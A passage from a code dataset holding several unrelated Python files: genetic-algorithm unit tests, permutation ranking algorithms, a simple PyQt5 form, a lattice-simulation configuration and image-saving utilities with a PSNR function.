1.0\n assert propagator.adaptation_settings_dict['srinivas_k4'] == 0.5\n assert propagator.adaptation_settings_dict['xiao_min_crossover_rate'] == 0.4\n assert propagator.adaptation_settings_dict['xiao_min_mutation_rate'] == 0.1\n assert propagator.adaptation_settings_dict['xiao_scale'] == 0.4\n\n\n@mock.patch('parametrization_clean.use_case.port.population_repository.IPopulationRepository')\n@pytest.mark.usefixtures('get_individuals')\ndef test_population_propagator_initialize(population_repository_mock, get_individuals, root_individual, all_settings):\n population_repository_mock.get_root_individual = mock.MagicMock(return_value=root_individual)\n\n costs = []\n for individual in get_individuals:\n individual.cost = individual.total_error(root_individual)\n costs.append(individual.cost)\n propagator = PopulationPropagator(all_settings, population_repository_mock)\n sorted_costs = sorted(costs)\n\n children = propagator.initialize(get_individuals)\n assert len(children) == 2\n assert children[0].cost == sorted_costs[0]\n assert children[1].cost == sorted_costs[1]\n\n propagator.ga_settings.use_elitism = False\n children = propagator.initialize(get_individuals)\n assert len(children) == 0\n\n\n@mock.patch('parametrization_clean.use_case.port.population_repository.IPopulationRepository')\n@pytest.mark.usefixtures('get_individuals')\ndef test_population_propagator_select(population_repository_mock, get_individuals, root_individual, all_settings):\n population_repository_mock.get_root_individual = mock.MagicMock(return_value=root_individual)\n\n for individual in get_individuals:\n individual.cost = individual.total_error(root_individual)\n propagator = PopulationPropagator(all_settings, population_repository_mock)\n\n selected_individual = propagator.select(get_individuals)\n assert selected_individual in get_individuals\n\n\n@mock.patch('random.random')\n@pytest.mark.usefixtures('get_individuals')\ndef test_population_propagator_cross(rand_mock, population_repository, get_individuals, all_settings):\n propagator = PopulationPropagator(all_settings, population_repository)\n parent1 = get_individuals[0]\n parent2 = get_individuals[1]\n\n rand_mock.return_value = 0.60\n child1, child2 = propagator.cross(parent1, parent2)\n assert child1.params != parent1.params and child1.params != parent2.params\n assert child2.params != parent2.params and child2.params != parent1.params\n\n rand_mock.return_value = 0.90\n child1, child2 = propagator.cross(parent1, parent2)\n assert child1.params == parent1.params and child2.params == parent2.params\n\n\n@mock.patch('random.random')\n@pytest.mark.usefixtures('get_individuals')\ndef test_population_propagator_mutate(rand_mock, population_repository, get_individuals, all_settings):\n propagator = PopulationPropagator(all_settings, population_repository)\n parent1 = get_individuals[0]\n parent2 = get_individuals[1]\n\n propagator.mutation_rates = [0.20, 0.20]\n rand_mock.return_value = 0.10\n child1, child2 = propagator.mutate(parent1, parent2)\n assert child1.params != parent1.params\n assert child2.params != parent2.params\n\n propagator.mutation_rates = [0.20, 0.05]\n child1, child2 = propagator.mutate(parent1, parent2)\n assert child1.params != parent1.params\n assert child2.params == parent2.params\n\n\n@mock.patch('parametrization_clean.use_case.port.population_repository.IPopulationRepository')\n@pytest.mark.usefixtures('get_individuals')\ndef test_population_propagator_adapt(population_repository_mock, get_individuals, root_individual, all_settings):\n population_repository_mock.get_root_individual = mock.MagicMock(return_value=root_individual)\n\n for individual in get_individuals:\n individual.cost = individual.total_error(root_individual)\n\n propagator = PopulationPropagator(all_settings, population_repository_mock)\n propagator.ga_settings.use_adaptation = True\n\n # Two mock dictionaries passed in kwargs for adaptation...must remove duplicate keys\n propagator.ga_settings_dict.pop('_mock_return_value')\n propagator.ga_settings_dict.pop('_mock_parent')\n propagator.ga_settings_dict.pop('_mock_name')\n propagator.ga_settings_dict.pop('_mock_new_name')\n propagator.ga_settings_dict.pop('_mock_new_parent')\n propagator.ga_settings_dict.pop('_mock_sealed')\n propagator.ga_settings_dict.pop('_spec_class')\n propagator.ga_settings_dict.pop('_spec_set')\n propagator.ga_settings_dict.pop('_spec_signature')\n propagator.ga_settings_dict.pop('_mock_methods')\n propagator.ga_settings_dict.pop('_mock_children')\n propagator.ga_settings_dict.pop('_mock_wraps')\n propagator.ga_settings_dict.pop('_mock_delegate')\n propagator.ga_settings_dict.pop('_mock_called')\n propagator.ga_settings_dict.pop('_mock_call_args')\n propagator.ga_settings_dict.pop('_mock_call_count')\n propagator.ga_settings_dict.pop('_mock_call_args_list')\n propagator.ga_settings_dict.pop('_mock_mock_calls')\n propagator.ga_settings_dict.pop('method_calls')\n propagator.ga_settings_dict.pop('_mock_unsafe')\n propagator.ga_settings_dict.pop('_mock_side_effect')\n # Two mock dictionaries passed in kwargs for adaptation...must remove duplicate keys\n\n average_cost, minimum_cost = propagator.compute_statistics(get_individuals)\n parent1_cost = get_individuals[2].cost\n parent2_cost = get_individuals[3].cost\n propagator.adapt_cross_and_mutate_rates(average_cost, minimum_cost, (parent1_cost, parent2_cost))\n assert propagator.crossover_rate != 0.80\n assert propagator.mutation_rates[0] != 0.20\n assert propagator.mutation_rates[1] == 0.20\n\n\n@mock.patch('parametrization_clean.use_case.port.population_repository.IPopulationRepository')\n@pytest.mark.usefixtures('get_individuals')\ndef test_population_propagator_compute_statistics(population_repository_mock, get_individuals,\n root_individual, all_settings):\n population_repository_mock.get_root_individual = mock.MagicMock(return_value=root_individual)\n\n for individual in get_individuals:\n individual.cost = individual.total_error(root_individual)\n propagator = PopulationPropagator(all_settings, population_repository_mock)\n parents = get_individuals\n\n average_cost, minimum_cost = propagator.compute_statistics(parents)\n assert average_cost == pytest.approx(1037.955, rel=1e-3)\n assert minimum_cost == pytest.approx(239.558, rel=1e-3)\n\n\n@mock.patch('parametrization_clean.use_case.port.population_repository.IPopulationRepository')\n@pytest.mark.usefixtures('get_individuals')\ndef test_population_propagator_execute(population_repository_mock, get_individuals, root_individual, all_settings):\n population_repository_mock.get_root_individual = mock.MagicMock(return_value=root_individual)\n\n for individual in get_individuals:\n individual.cost = individual.total_error(root_individual)\n propagator = PopulationPropagator(all_settings, population_repository_mock)\n parents = get_individuals\n\n children = propagator.execute(parents)\n\n assert len(children) == 4\n","repo_name":"cdaksha/parametrization_clean","sub_path":"tests/use_case/test_population_propagator.py","file_name":"test_population_propagator.py","file_ext":"py","file_size_in_byte":13164,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"78"} +{"seq_id":"33679009181","text":"import math\n\n__author__ = \"Bram Devlaminck\"\n\n\ndef perm_lex_successor(input_permutation: list[int]) -> list[int] | None:\n \"\"\"\n Algorithm 2.14\n\n Return the successor if it exists, otherwise return None\n \"\"\"\n n: int = len(input_permutation)\n # take a copy of input and add 0 to start to insure while loop later terminates\n permutation = [0] + input_permutation[::]\n # find i such that perm[i] < perm[i+1] > perm[i + 2] > ... > perm[n]\n i = n - 1\n while i >= 1 and permutation[i + 1] < permutation[i]:\n i -= 1\n if i == 0:\n return None\n\n # find j such that perm[j] > perm[i] and perm[k] < perm[i] for j < k <= n\n j = n\n while j >= 1 and permutation[j] < permutation[i]:\n j -= 1\n\n # switch the values at index j and i\n permutation[i], permutation[j] = permutation[j], permutation[i]\n\n # reverse the sublist [perm[i+1, ..., perm[n]] and return (and remove the 0 at the beginning)\n return permutation[1:i + 1] + permutation[i + 1:][::-1]\n\n\ndef perm_lex_rank(input_permutation: list[int]) -> int:\n \"\"\"Algorithm 2.15\"\"\"\n n = len(input_permutation)\n r = 0\n permutation = input_permutation[::]\n for j in range(n):\n # j + 1 in the factorial since indices start at 0, but we need to start counting this multiplication from 1\n r += (permutation[j] - 1) * math.factorial(n - (j + 1))\n for i in range(j + 1, n):\n if permutation[i] > permutation[j]:\n permutation[i] -= 1\n\n return r\n\n\ndef perm_lex_unrank(n: int, rank: int) -> list[int]:\n \"\"\"Algorithm 2.16\"\"\"\n\n permutation = [0 for _ in range(n)]\n permutation[-1] = 1\n\n for j in range(1, n):\n j_faculty = math.factorial(j)\n d = (rank % (j_faculty * (j + 1))) // j_faculty\n rank -= d * j_faculty\n permutation[n - j - 1] = d + 1\n for i in range(n - j, n):\n if permutation[i] > d:\n permutation[i] += 1\n\n return permutation\n\n\ndef trotter_johnson_rank(permutation: list[int]) -> int:\n \"\"\"Algorithm 2.17\"\"\"\n n = len(permutation)\n rank = 0\n for j in range(2, n + 1):\n k = 1\n i = 0\n # search for the location of j in the permutation, in this iteration we see j as the \"biggest value\"\n # of the permutation => ignore all the values that are bigger than j to calculate the position\n while permutation[i] != j:\n # we ignore all the values bigger than j to calculate the position of j in the permutation\n # since as explained earlier: we see j as the maximum value of the permutation\n # all the other values are only \"inserted later\" by recursion (if we had implemented this recursively)\n if permutation[i] < j:\n k += 1\n i += 1\n\n # adjust the rank appropriately depending on if we were on an even or odd rank\n if rank % 2 == 0:\n rank = j * rank + j - k\n else:\n rank = j * rank + k - 1\n\n return rank\n\n\ndef trotter_johnson_unrank(n: int, rank: int) -> list[int]:\n \"\"\"Algorithm 2.18\"\"\"\n\n # the base permutation is just the value 1, we will add to this to create the final permutation\n permutation = [1]\n r2 = 0\n\n for j in range(2, n + 1):\n r1 = math.floor(rank * math.factorial(j) / math.factorial(n))\n k = (r1 - j * r2)\n # calculate until where we have to loop\n end_index = j - k - 2 if r2 % 2 == 0 else k - 1\n # perform insertion at right index\n # (doing it this way removes the need to manually move all the elements to the right)\n permutation.insert(end_index + 1, j)\n\n # update r2 with r1\n r2 = r1\n\n return permutation\n\n\ndef perm_parity(permutation: list[int]) -> int:\n \"\"\"Algorithm 2.19\"\"\"\n n = len(permutation)\n visited = [False for _ in range(n)]\n number_of_circuits = 0\n for j in range(n):\n # if not visited[j] => count it as a circuit and visit the complete circuit\n if not visited[j]:\n number_of_circuits += 1\n visited[j] = True\n # expand this current circuit,\n # to make sure we don't count the other nodes that are in this circuit as a separate circuit\n # \"permutation[i] != j + 1\" will be False when we revisit the node that we started\n # => we don't follow the circuit endlessly\n i = j\n while permutation[i] != j + 1:\n i = permutation[i] - 1\n visited[i] = True\n return (n - number_of_circuits) % 2\n\n\ndef trotten_johnson_successor(input_permutation: list[int]) -> list[int] | None:\n \"\"\"\n Algorithm 2.20\n\n Return the successor if it exists, otherwise return None\n \"\"\"\n n = len(input_permutation)\n start_index = 0\n # this is a copy used to modify and \"simulate\" the recursive formulation of the algorithm\n working_permutation = input_permutation[::]\n # in this array we build op our result\n permutation = input_permutation[::]\n\n done = False\n m = n\n while m > 1 and not done:\n # search the index of where the maximum value is located in the permutation\n d = working_permutation.index(m)\n\n # simulate the recursion by removing the biggest element d out of the permutation\n del working_permutation[d]\n\n if perm_parity(working_permutation) == 1:\n # odd parity\n\n # we are at the end => decrease m for smaller recursive step where we need to transpose 2 values\n if d == m - 1:\n m -= 1\n else:\n # not at the end of the diagonal => transpose here\n permutation[start_index + d], permutation[start_index + d + 1] = permutation[start_index + d + 1], permutation[start_index + d]\n done = True\n else:\n # even parity\n\n # we are at the beginning => decrease m for smaller recursive step where we need to transpose 2 values\n # and increase start index\n if d == 0:\n m -= 1\n start_index += 1\n else:\n # not at the beginning of the diagonal => transpose here\n permutation[start_index + d], permutation[start_index + d - 1] = permutation[start_index + d - 1], permutation[start_index + d]\n done = True\n # no successor exists\n if m == 1:\n return None\n\n # return the successor\n return permutation\n\n\ndef generate_heaps_algorithm(k: int) -> list[list[int]]:\n \"\"\"\n The first simple (recursive) generate algorithm from the wikipedia page: https://en.wikipedia.org/wiki/Heap%27s_algorithm\n \"\"\"\n\n def generate_recursive(k: int, current_res: list[int]) -> list[list[int]]:\n \"\"\"Recursive step for the generate algorithm\"\"\"\n if k == 1:\n # take copy since otherwise we will be mutating this exact array laster in another recursive step\n return [current_res[::]]\n else:\n results = []\n # recursive step for unchanged array\n results += generate_recursive(k - 1, current_res)\n # do mutations and recursive steps on these mutations\n for i in range(k - 1):\n if k % 2 == 0:\n current_res[i], current_res[k - 1] = current_res[k - 1], current_res[i]\n else:\n current_res[0], current_res[k - 1] = current_res[k - 1], current_res[0]\n # add results of recursive steps\n results += generate_recursive(k - 1, current_res)\n # return all the recursive steps\n return results\n\n return generate_recursive(k, [i + 1 for i in range(k)])\n\n\nif __name__ == \"__main__\":\n print(perm_lex_successor([1, 2, 3]))\n print(\"-----------\")\n print(perm_lex_rank([2, 4, 1, 3]))\n print(\"-----------\")\n print(perm_lex_unrank(4, 10))\n print(\"-----------\")\n print(trotter_johnson_rank([3, 4, 2, 1]))\n print(\"-----------\")\n print(trotter_johnson_unrank(4, 13))\n print(\"-----------\")\n print(perm_parity([5, 1, 3, 4, 2]))\n print(\"-----------\")\n print(trotten_johnson_successor([4, 3, 1, 2]))\n print(\"-----------\")\n print(generate_heaps_algorithm(3))\n","repo_name":"BramDevlaminck/DiscreteAlgorithmsCombinatorialGeneration","sub_path":"permutations.py","file_name":"permutations.py","file_ext":"py","file_size_in_byte":8221,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"71316931772","text":"import sys\nfrom PyQt5 import QtWidgets\nfrom PyQt5.QtWidgets import QApplication, QMainWindow, QToolTip\nfrom PyQt5.QtGui import QIcon\nfrom PyQt5.QtCore import QRect, QSize\n\n\nclass MyWindow(QMainWindow) :\n def __init__(self) :\n super(MyWindow, self).__init__()\n self.setWindowTitle(\"ilk form uygulamam - 2 Class Uygulaması\")\n self.setGeometry(0, 0, 500, 500)\n self.setWindowIcon(QIcon('icon.png'))\n self.setToolTip(\"Class Uygulaması\")\n self.initUI()\n \n def initUI(self) :\n self.lbl_name = QtWidgets.QLabel(self)\n self.lbl_name.setText(\"adınız : \")\n self.lbl_name.move(50, 30)\n\n self.lbl_surname = QtWidgets.QLabel(self)\n self.lbl_surname.setText(\"Soyadınız : \")\n self.lbl_surname.move(50, 60)\n\n self.lbl_result = QtWidgets.QLabel(self)\n self.lbl_result.setText(\"Sonuç : \") \n self.lbl_result.resize(300,32)\n self.lbl_result.move(150, 190)\n\n self.txt_name = QtWidgets.QLineEdit(self)\n self.txt_name.move(150, 30) \n self.txt_name.resize(200, 32)\n\n self.txt_surname = QtWidgets.QLineEdit(self)\n self.txt_surname.move(150, 60)\n self.txt_surname.resize(200, 32)\n\n \n self.btn_save = QtWidgets.QPushButton(self)\n self.btn_save.setText(\"Kaydet\")\n self.btn_save.move(150, 100)\n self.btn_save.clicked.connect(self.tikla)\n\n\n ###### Son eklemeler START ######################\n self.btn_yeni = QtWidgets.QPushButton(\"yeni\",self)\n self.btn_yeni.setIcon(QIcon(\"green.ico\"))\n self.btn_yeni.setIconSize(QSize(50,50)) ## w,h\n self.btn_yeni.setGeometry(QRect(150,250,100,75)) ## x,y,w,h\n ###### Son eklemeler START ######################\n\n\n \n\n def tikla(self) : \n print(\"Merhaba \"+ self.txt_name.text() + \" \" + self.txt_surname.text())\n self.lbl_result.setText(\"Sonuç : Merhaba \"+ self.txt_name.text() + \" \" + self.txt_surname.text()) \n\n \n\ndef window() :\n app = QApplication(sys.argv)\n win = MyWindow()\n \n\n win.show()\n sys.exit(app.exec_()) # x ile kapatılabilme\n\nwindow()\n\n","repo_name":"bm-snnsmsk/my_workshop","sub_path":"python/002_pyqt5/003_QtWidgetler_class.py","file_name":"003_QtWidgetler_class.py","file_ext":"py","file_size_in_byte":2138,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"70545811451","text":"import os\nimport AbstractionLayer as QLGA\n\n\n\n######################################################################################\n############################# SIMULATION PARAMS ######################################\n######################################################################################\n#### LATTICE INFO ####\n# For particles >=2, (x,y,z) represents indices of number basis kets along each direction, ie. if xDim=L then XBLOCK*XGRID = L(2*L-1)\nPARTICLES = 1\nKINETIC_OPERATOR = 'S' # S for Schroedinger equation, D for Dirac ...\nFRAME_SIZE = 5\nNUM_FRAMES = 2\n\n\nLx = 128 # Parameter to scale lattice size along x\nLy = 128 # Parameter to scale lattice size along y\nLz = 128 # Parameter to scale lattice size along z\n\n## the following are directory names defined by the user\nBATCH = 'Multi_run_test'\nRUN ='sols 1, 3'\n\n\nDEVICES = [0,1] # References to devices to use\n\n##Visualization only for existing data\nVIS_ONLY = False\n\n## Animation only\nANI_ONLY = False\n\n## Overwrite Existing files\nOVERWRITE = True\n######################################################################################\n########################## SIMULATION PARAMS END #####################################\n######################################################################################\n\n\n############################# INITIAL CONDITIONS #####################################\n\n\n#INIT = \"gaussians_2P_1D\"\nINIT = 'double_quadrupole_3d'\n#INIT = 'double_quadrupole'\n#INIT = 'pade_quadrupole'\n\n\n############################ SIMULATION PHYSICS MODEL ################################\n\nMODEL = 'spin2_BEC'\n# MODEL = \"No_Self_Interaction\"\n# MODEL = \"Internal_Function\"\n\n\n\n############################ EXPERIMENT KEYWORDS #####################################\n\n# default keywords can be found in each file in the following directory\n# Code/Initialization/CUDA_Initializations/Default/ [initial condition name]\n# Values defined in each function declaration are the default values\n# if EXP_KWARGS below are defined they will be passed to overwrite the defaults\n# make a checkbox that can be used to input each value manually and overwrite defaults\n\n# where all kwargs are passed can be found defined in Code/Initialization/initializations.py lines 79-83\n# under compile_model_source function declaration\n\n# when using default values define an empty set\n# e.g. EXP_KWARGS = {}\n\n# EXP_KWARGS = {'G0' : 1., 'G1' : .1, 'G2': 1., 'MU':1., 'scaling' : 5, \"solution1\" : 5, \"orientation1\" : \"x\"}\nEXP_KWARGS = {'G0' : 1., 'G1' : .1, 'G2': 1., 'MU':1., 'scaling' : 25, \"solution1\" : 1,\"solution2\" : 3, \"orientation2\" : \"x\", \"y_shift2\" : 1./4.}\n# EXP_KWARGS = {'momentums': [4.0, 0.0, 4.0, 0.0], 'shifts': [0.3, 0.7, 0.4, 0.8], 'sigmas': [0.025, 0.025, 0.25, 0.25]}\n### 'cond_list': ['X1==X2', 'true'], 'func_list': ['0.', '(4.*pi)*(1./abs(X1-X2))'], coulomb\n\n########################### EXTERNAL POTENTIAL #####################################\n\n\nPOTENTIAL = \"No_Potential\"\nPOTENTIAL_KWARGS = {}\n# POTENTIAL = \"External_Function\"\n# POTENTIAL_KWARGS = {\"cond_list\":[\"X1Lx/10.) || (X1>Lx/10. && X2=Lx/2. && X2>=Lx/2.\",\"X1=Lx/2.\", \"X1>=Lx/2. && X2= 0.5] = 1;\n mask = mask[..., None] # [H, W, 1];\n num_none_zeros_pixels = mask.sum()\n # sum(diff**2) / num_pixels, the pixels' difference;\n if in_masks:\n mse = (np.abs(im1*mask - im2*mask) ** 2).sum() / num_none_zeros_pixels\n else:\n mse = (np.abs(im1*mask - im2*mask) ** 2).mean() # only calculate the \n psnr = 10 * np.log10(255 * 255 / mse)\n return psnr\n\n# 0. basic utils.\ndef seed_everything(seed):\n random.seed(seed)\n os.environ['PYTHONHASHSEED'] = str(seed)\n np.random.seed(seed)\n torch.manual_seed(seed)\n torch.cuda.manual_seed(seed)\n\ndef save_rgb_dsr_results(opts, visuals, local_rank, subject_name, epoch, idx, phase='training'):\n image_dir = os.path.join(opts.model_dir, phase)\n make_dir(image_dir)\n save_path_rgb = os.path.join(image_dir, 'rgb_{}_rank{}_epoch{}_idx_dsr{}.jpg'.format(subject_name, local_rank, epoch, idx))\n \n if opts.is_train:\n assert opts.batch_size == 1, 'validating batch size must be 1.'\n \n input_rgbs, target_rgbs, blend_high_freq, \\\n predicted_rgbs, rgbs_refine, input_normals = \\\n visuals['rgbs'], visuals['target_rgbs'], visuals['_blend_high_fq'], \\\n visuals['_rgbs'], visuals['_rgbs_refine'], visuals['_r_normals'] ;\n \n input_rgbs = input_rgbs.view(-1, opts.num_views, 3, opts.img_size, opts.img_size)\n target_rgbs = target_rgbs.view(-1, 3, opts.img_size, opts.img_size)\n input_normals = F.interpolate(input_normals.view(-1, 3, opts.load_size, opts.load_size), (opts.img_size,opts.img_size), mode='bilinear')\n input_normals = input_normals.view(-1, opts.num_views, 3, opts.img_size, opts.img_size)\n \n # rgbs_warpped = (rgbs_wp_left + rgbs_wp_right) / 2.0 # [1k, 1k]\n rgbs_warpped = torch.clamp( blend_high_freq, 0, 1.0 ) # clamp to [0,1]\n predicted_rgbs = predicted_rgbs.view(-1, opts.load_size, opts.load_size, 3).permute(0, 3, 1, 2)\n predicted_rgbs = F.interpolate(predicted_rgbs, (opts.img_size, opts.img_size), mode='bilinear')\n rgbs_refine = torch.clamp( rgbs_refine.view(-1, 3, opts.img_size, opts.img_size), 0.0, 1.0 )\n \n predicted_rgbs_ = predicted_rgbs[0].permute(1,2,0).detach().cpu().numpy() * 255.0\n rgbs_warpped_ = rgbs_warpped[0].permute(1,2,0).detach().cpu().numpy() * 255.0\n rgbs_refine_ = rgbs_refine[0].permute(1,2,0).detach().cpu().numpy() * 255.0\n \n _rgbs = []; _depths = [];\n for i in range(opts.num_views):\n _rgbs.append( input_rgbs[0,i].permute(1,2,0).detach().cpu().numpy() * 255.0 ) # [H,W,3]\n # _input_depth = input_depths[0,i].detach().cpu().numpy() # [H,W]\n # _input_depth = np.clip( (_input_depth + 1)*0.5, 0, 1)\n # _input_depth = np.stack([_input_depth]*3, axis=-1) # [H,W,3]\n _depths.append( input_normals[0,i].permute(1,2,0).detach().cpu().numpy() * 255.0 )\n \n # [H,W*3,3]\n _rgbs = np.concatenate(_rgbs, axis=1)\n _depths = np.concatenate( _depths, axis=1 )\n \n # get predicted results.\n _target_rgbs = target_rgbs[0].permute(1,2,0).detach().cpu().numpy() * 255.0\n # _target_depths = target_depths[0,0].detach().cpu().numpy()\n \n # _target_depths = np.clip( (_target_depths + 1)*0.5, 0, 1)\n # _target_depths = np.stack([_target_depths]*3, axis=-1) * 255 # [H,W,3]\n \n # rgbs = []; depths = []; _rgbs = []; _depths = [];\n # for i in range(opts.batch_size): # the \n # rgbs.append( predicted_rgbs_[i] )\n # depths.append( predicted_depths_[i] )\n # _rgbs.append( target_rgbs[i,0].permute(1,2,0).detach().cpu().numpy() * 255.0 )\n # _depths.append( target_depths[i,0,0].detach().cpu().numpy() * 10000.0 )\n\n # rgbs = np.concatenate(rgbs, axis=1) # [H, W*B, 3]\n # depths = np.concatenate(depths, axis=1) # [H, W*B]\n # _rgbs = np.concatenate(_rgbs, axis=1) # [H, W*B, 3]\n # _depths = np.concatenate(_depths, axis=1) # [H, W*B]\n \n _rgbs = np.concatenate([_rgbs, _target_rgbs, predicted_rgbs_], axis=1)\n _depths = np.concatenate([_depths, rgbs_warpped_, rgbs_refine_], axis=1)\n output = np.concatenate([_rgbs, _depths], axis=0)\n \n Image.fromarray( output.astype(np.uint8) ).save(save_path_rgb)\n\ndef save_rgb_depths_depthdenoising(opts, visuals, local_rank, subject_name, epoch, idx, phase='training'):\n image_dir = os.path.join(opts.model_dir, phase)\n make_dir(image_dir)\n\n input_rgbs, input_masks, predicted_depths, predicted_normals = \\\n visuals['rgbs'], visuals['masks'], visuals['_r_depths'], visuals['_r_normals']\n\n input_rgbs = input_rgbs.view(-1, opts.num_views, 3, opts.img_size, opts.img_size)\n input_masks = input_masks.view(-1, opts.num_views, 1, opts.img_size, opts.img_size) # [B,1,H,W]\n predicted_depths = predicted_depths.view(-1, opts.num_views, 1, opts.img_size, opts.img_size);\n predicted_normals = predicted_normals.view(-1, opts.num_views, 3, opts.img_size, opts.img_size)\n predicted_depths, _, _, _ = _depth_normalizer(predicted_depths[:, :, 0], opts.valid_depth_min, opts.valid_depth_max)\n\n _rgbs = []; _depths = []; _normals = []\n for i in range(opts.num_views):\n _rgbs.append( input_rgbs[0,i].permute(1,2,0).detach().cpu().numpy() * 255.0 ) # [H,W,3]\n _input_depth = predicted_depths[0,i].detach().cpu().numpy() # [H,W]\n _input_depth = np.clip( (_input_depth + 1)*0.5, 0, 1)\n _input_depth = np.stack([_input_depth]*3, axis=-1) # [H,W,3]\n _depths.append( _input_depth * 255.0 )\n _normals.append( predicted_normals[0,i].permute(1,2,0).detach().cpu().numpy() * 255.0 ) # [H,W,3]\n\n _rgbs = np.concatenate(_rgbs, axis=1)\n _depths = np.concatenate( _depths, axis=1 )\n _normals = np.concatenate( _normals, axis=1 )\n\n output = np.concatenate([_rgbs, _depths, _normals], axis=0)\n\n save_path_rgb = os.path.join( image_dir, 'rgb_{}_rank{}_epoch{}_idx{}.jpg'.format(subject_name, local_rank, epoch, idx) )\n\n Image.fromarray( output.astype(np.uint8) ).save(save_path_rgb)\n\ndef save_rgb_depths_1k(opts, visuals, local_rank, subject_name, epoch, idx, phase='training'):\n image_dir = os.path.join(opts.model_dir, phase)\n make_dir(image_dir)\n \n if opts.is_train:\n assert opts.batch_size == 1, 'validating batch size must be 1.'\n \n input_rgbs, input_depths, input_masks, \\\n target_rgbs, target_depths, target_masks, \\\n predicted_rgbs, predicted_depths = \\\n visuals['rgbs'], visuals['_r_depths'], visuals['masks'], \\\n visuals['target_rgbs'], visuals['target_depths'], visuals['target_masks'], \\\n visuals['_rgbs'], visuals['_depths'];\n \n # inputs resize, only when resolution 1K.\n input_rgbs = input_rgbs.view(-1, opts.num_views, 3, opts.img_size, opts.img_size)\n input_depths = F.interpolate(input_depths, (opts.img_size,opts.img_size), mode='nearest')\n input_depths = input_depths.view(-1, opts.num_views, 1, opts.img_size, opts.img_size)\n target_rgbs = target_rgbs.view(-1, 3, opts.img_size, opts.img_size)\n target_depths = target_depths.view(-1, 1, opts.img_size, opts.img_size)\n target_masks = target_masks.view(-1, 1, opts.img_size, opts.img_size) # [B,1,H,W]\n \n predicted_rgbs = predicted_rgbs.view(-1, opts.load_size * opts.load_size, 4, 3).view(-1, opts.load_size * opts.load_size, 12).permute(0,2,1) # [B*Nv, 12, N_p]\n predicted_rgbs = predicted_rgbs[:,[0,3,6,9,1,4,7,10,2,5,8,11]]\n # predicted_rgbs = predicted_rgbs.reshape(-1, opts.load_size, opts.load_size, 2, 2, 3)\n # predicted_rgbs = predicted_rgbs.view(-1, opts.load_size * opts.load_size, 4, 3)\n predicted_rgbs = F.fold(predicted_rgbs, (opts.img_size, opts.img_size), (2,2), stride=2).permute(0,2,3,1) # [b*n_v,3,h,w]\n predicted_rgbs = torch.clamp(predicted_rgbs, 0, 1) # [1, 3, H, W];\n # target_rgbs : [1, 3, H, W];\n \n predicted_depths = predicted_depths.view(-1, 1, opts.load_size, opts.load_size);\n predicted_depths = F.interpolate(predicted_depths, (opts.img_size,opts.img_size), mode='nearest')\n \n predicted_depths, _, _, _ = _depth_normalizer(predicted_depths, opts.valid_depth_min, opts.valid_depth_max)\n # the predicted depths normalization:\n # predicted_depths = (predicted_depths - opts.z_size) / opts.z_bbox_len * target_masks[:,0];\n # predicted_depths = (predicted_depths - opts.z_size) / opts.z_bbox_len;\n # input_depths,[B,N,1,H,W]\n input_depths, _, _, _ = _depth_normalizer(input_depths[:, :, 0], opts.valid_depth_min, opts.valid_depth_max)\n # normalize the target depths.\n target_depths, _, _, _ = _depth_normalizer(target_depths, opts.valid_depth_min, opts.valid_depth_max)\n \n predicted_rgbs_ = predicted_rgbs[0].detach().cpu().numpy() * 255.0 # [H,W,3]\n predicted_depths_ = predicted_depths[0,0].detach().cpu().numpy()\n target_masks = target_masks[0,0].detach().cpu().numpy() # [H,W]\n \n _rgbs = []; _depths = [];\n for i in range(opts.num_views):\n _rgbs.append( input_rgbs[0,i].permute(1,2,0).detach().cpu().numpy() * 255.0 ) # [H,W,3]\n _input_depth = input_depths[0,i].detach().cpu().numpy() # [H,W]\n _input_depth = np.clip( (_input_depth + 1)*0.5, 0, 1)\n _input_depth = np.stack([_input_depth]*3, axis=-1) # [H,W,3]\n _depths.append( _input_depth * 255.0 )\n \n # [H,W*3,3]\n _rgbs = np.concatenate(_rgbs, axis=1)\n _depths = np.concatenate( _depths, axis=1 )\n \n # get predicted results.\n _target_rgbs = target_rgbs[0].permute(1,2,0).detach().cpu().numpy() * 255.0\n _target_depths = target_depths[0,0].detach().cpu().numpy()\n \n _target_depths = np.clip( (_target_depths + 1)*0.5, 0, 1)\n _target_depths = np.stack([_target_depths]*3, axis=-1) * 255 # [H,W,3]\n \n predicted_depths_ = np.clip( (predicted_depths_ + 1)*0.5, 0, 1)\n predicted_depths_ = np.stack([predicted_depths_]*3, axis=-1) * 255 # [H,W,3]\n \n # rgbs = []; depths = []; _rgbs = []; _depths = [];\n # for i in range(opts.batch_size): # the \n # rgbs.append( predicted_rgbs_[i] )\n # depths.append( predicted_depths_[i] )\n # _rgbs.append( target_rgbs[i,0].permute(1,2,0).detach().cpu().numpy() * 255.0 )\n # _depths.append( target_depths[i,0,0].detach().cpu().numpy() * 10000.0 )\n\n # rgbs = np.concatenate(rgbs, axis=1) # [H, W*B, 3]\n # depths = np.concatenate(depths, axis=1) # [H, W*B]\n # _rgbs = np.concatenate(_rgbs, axis=1) # [H, W*B, 3]\n # _depths = np.concatenate(_depths, axis=1) # [H, W*B]\n\n _rgbs = np.concatenate([_rgbs, _target_rgbs, predicted_rgbs_], axis=1)\n _depths = np.concatenate([_depths, _target_depths, predicted_depths_], axis=1)\n output = np.concatenate([_rgbs, _depths], axis=0)\n\n # PSNR values;\n psnr = cal_psnr( predicted_rgbs_, _target_rgbs, target_masks, in_masks=False ) # target_rgbs & target_rgbs are weighted by masks\n psnr = round(psnr, 2)\n # Image.fromarray( rgbs.astype(np.uint8) ).save(save_path_rgb)\n # Image.fromarray( _rgbs.astype(np.uint8) ).save(save_path_rgb_)\n # cv2.imwrite( save_path_depth, depths.astype(np.uint16) )\n # cv2.imwrite( save_path_depth_, _depths.astype(np.uint16) )\n save_path_rgb = os.path.join( image_dir, 'rgb_{}_rank{}_epoch{}_idx{}_psnr_{}.jpg'.format(subject_name, local_rank, epoch, idx, psnr) )\n\n Image.fromarray( output.astype(np.uint8) ).save(save_path_rgb)\n \ndef save_rgb_depths(opts, visuals, local_rank, subject_name, epoch, idx, phase='training'):\n image_dir = os.path.join(opts.model_dir, phase)\n make_dir(image_dir)\n save_path_rgb = os.path.join(image_dir, 'rgb_{}_rank{}_epoch{}_idx{}.jpg'.format(subject_name, local_rank, epoch, idx))\n\n if opts.is_train:\n assert opts.batch_size == 1, 'validating batch size must be 1.'\n \n input_rgbs, input_depths, input_masks, \\\n target_rgbs, target_depths, target_masks, 